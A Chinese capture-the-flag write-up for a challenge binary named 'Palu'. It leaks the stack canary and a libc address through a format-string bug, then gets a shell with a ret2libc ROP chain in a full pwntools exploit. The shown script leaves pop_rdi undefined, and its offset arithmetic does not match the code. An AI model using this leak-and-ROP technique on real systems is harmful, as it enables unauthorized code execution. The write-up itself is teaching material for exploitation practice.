文件保护
libc版本
libc6_2.23-0ubuntu11.3_amd64
ida加载
疑似后门函数
无溢出点
主函数中存在格式化字符串漏洞
菜单函数无溢出漏洞 看字母提示猜测函数可能是进行编码和解码操作
解码函数存在栈溢出漏洞
思路
由于文件开启canary,栈溢出得先泄漏canary地址,由于没有后门函数也无静态函数,还需要泄漏libc地址进行ret2libc
实现
首先进行断点设置
将断点设置在栈溢出漏洞前
泄漏canary地址,利用格式化字符串漏洞
canary偏移量 为v10到栈顶的距离
v4=8h+88h=90h canary偏移量=v4-v10=90h-8h=88h=136/8=17 因为amd64的缘故需要加上6个寄存器所以偏移量为25
io.sendafter("Please tell me your name\n","%23$p")
canary = int(io.recv(18),16)
由于没有后面还需要泄漏libc地址我们利用canary后的__libc_start_main_ret进行泄漏
io.sendafter("Please tell me your name\n","%23$p-%25$p")
canary = int(io.recv(18),16)
io.recvuntil(b'-')
libc_base = int(io.recv(14),16) - 0x20840
绕过检测
利用解码后等于Palu绕过检测
exp
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
filename = './Palu'
io = process(filename)
#io = remote("192.168.20.1",9078)
elf = ELF(filename)
libc = elf.libc
#libc = ELF('./libc.so.6')
def debug():
gdb.attach(io,'b *0x400e16')
# 1.泄露libc和canary
io.sendafter("Please tell me your name\n","%23$p-%25$p")
canary = int(io.recv(18),16)
io.recvuntil(b'-')
libc_base = int(io.recv(14),16) - 0x20840
print("canary:" + hex(canary))
print("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.sym['system']
#(1)(2)测试结果相同
#(1)pop_rdi = libc_base + 0x0000000000021112# pop rdi; ret;
#(2)pop_rdi = 0x00000000004010a3
ret = 0x0000000000400761# ret;
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))
# 2.进行decode操作
io.sendlineafter("Please tell me your options\n","2")
#debug()
io.sendlineafter("Enter a palu64 string to decode: ","UGFsdQ==") # 解码后等于Palu,可以绕过检测
# 正常的ret2libc
payload = flat([cyclic(0x18),canary,0x12345678,pop_rdi,bin_sh_addr,ret,system_addr])
io.sendafter("A small gift",payload)
io.interactive()